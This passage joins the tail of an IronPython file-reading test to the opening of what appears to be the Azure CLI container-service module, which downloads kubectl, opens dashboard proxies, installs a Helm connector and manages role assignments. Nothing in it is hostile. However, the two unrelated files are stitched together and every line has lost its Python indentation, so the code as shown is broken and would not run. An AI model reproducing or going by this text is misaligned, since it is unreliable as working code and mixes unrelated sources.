[[1.0,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[1.0000000000000215,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[1.0000000000055922,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[1.0000000014462318,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[1.0000003739752616,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[1.0000966950812187,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[1.0249990388312187,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[0.002856443435217224,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[8.5408832230361244e+194,3.1400000000000001,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996],[8.5408832230361244e+194,3.140000000000033,0.99734343339999998,1.1000000000000001,2.2000000000000002,3.2999999999999998,4.4000000000000004,5.5,6.5999999999999996]],
[0,1,2,3,4,5,6,7,8,9]],
]
#Cases working correctly under IronPython
for a_params, a_expected, f_expected in readinto_cases:
f_list = fileio_helper()
for i in range(len(f_list)):
a = array.array(*a_params)
ba = bytearray(a.tobytes())
f = f_list[i]
self.assertEqual(f.readinto(a),
f_expected[i])
self.assertEqual(a.tolist(),
a_expected[i])
# try with bytearray as well - https://github.com/IronLanguages/ironpython2/issues/713
f.seek(0)
self.assertEqual(f.readinto(ba), f_expected[i])
self.assertEqual(ba, a.tobytes())
#cleanup
for f in f_list:
f.close()
for i in range(len(f_list)):
try:
os.remove(TEMP_READINTO_NAME % i)
except:
pass
run_test(__name__)
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterServicePrincipalProfile
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceStorageProfileTypes
from azure.mgmt.containerservice.v2020_03_01.models import ManagedCluster
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterIdentity
from azure.mgmt.containerservice.v2020_03_01.models import AgentPool
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterSKU
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterWindowsProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterMasterPoolProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftAgentPoolProfileRole
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterIdentityProvider
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterAADIdentityProvider
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedCluster
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftRouterProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterAuthProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import NetworkProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftManagedClusterMonitorProfile
from azure.mgmt.containerservice.v2019_10_27_preview.models import OpenShiftAPIProperties
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._helpers import _populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None):
"""Install kubectl, a command-line interface for Kubernetes clusters."""
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group):
from subprocess import PIPE, Popen
instance = client.get(resource_group_name, name)
helm_not_installed = 'Helm not detected, please verify if it is installed.'
url_chart = chart_url
if image_tag is None:
image_tag = 'latest'
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# If SPN is specified, the secret should also be specified
if service_principal is not None and client_secret is None:
raise CLIError('--client-secret must be specified when --service-principal is specified')
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
# Validate the location upon the ACI avaiable regions
_validate_aci_location(norm_location)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
subscription_id = get_subscription_id(cmd.cli_ctx)
# Get the TenantID
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, tenant_id = profile.get_login_credentials()
# Check if we want the linux connector
if os_type.lower() in ['linux', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Linux', instance.enable_rbac, instance.fqdn)
# Check if we want the windows connector
if os_type.lower() in ['windows', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Windows', instance.enable_rbac, instance.fqdn)
def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, os_type, use_rbac, masterFqdn):
rbac_install = "true" if use_rbac else "false"
node_taint = 'azure.com/aci'
helm_release_name = connector_name.lower() + '-' + os_type.lower() + '-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
k8s_master = 'https://{}'.format(masterFqdn)
logger.warning("Deploying the ACI connector for '%s' using Helm", os_type)
try:
values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format(
node_name, node_taint, os_type, image_tag, rbac_install)
if service_principal:
values += ",env.azureClientId=" + service_principal
if client_secret:
values += ",env.azureClientKey=" + client_secret
if subscription_id:
values += ",env.azureSubscriptionId=" + subscription_id
if tenant_id:
values += ",env.azureTenantId=" + tenant_id
if aci_resource_group:
values += ",env.aciResourceGroup=" + aci_resource_group
if norm_location:
values += ",env.aciRegion=" + norm_location
# Currently, we need to set the master FQDN.
# This is temporary and we should remove it when possible
values += ",env.masterUri=" + k8s_master
if helm_cmd == "install":
subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values])
elif helm_cmd == "upgrade":
subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values])
except subprocess.CalledProcessError as err:
raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err))
def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, graceful=False, os_type='Linux'):
from subprocess import PIPE, Popen
helm_not_installed = "Error : Helm not detected, please verify if it is installed."
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
if os_type.lower() in ['linux', 'both']:
helm_release_name = connector_name.lower() + '-linux-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
if os_type.lower() in ['windows', 'both']:
helm_release_name = connector_name.lower() + '-windows-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
def _undeploy_connector(graceful, node_name, helm_release_name):
if graceful:
logger.warning('Graceful option selected, will try to drain the node first')
from subprocess import PIPE, Popen
kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.'
try:
Popen(["kubectl"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(kubectl_not_installed)
try:
drain_node = subprocess.check_output(
['kubectl', 'drain', node_name, '--force', '--delete-local-data'],
universal_newlines=True)
if not drain_node:
raise CLIError('Could not find the node, make sure you' +
' are using the correct --os-type')
except subprocess.CalledProcessError as err:
raise CLIError('Could not find the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
logger.warning("Undeploying the '%s' using Helm", helm_release_name)
try:
subprocess.call(['helm', 'del', helm_release_name, '--purge'])
except subprocess.CalledProcessError as err:
raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err))
try:
subprocess.check_output(
['kubectl', 'delete', 'node', node_name],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not delete the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
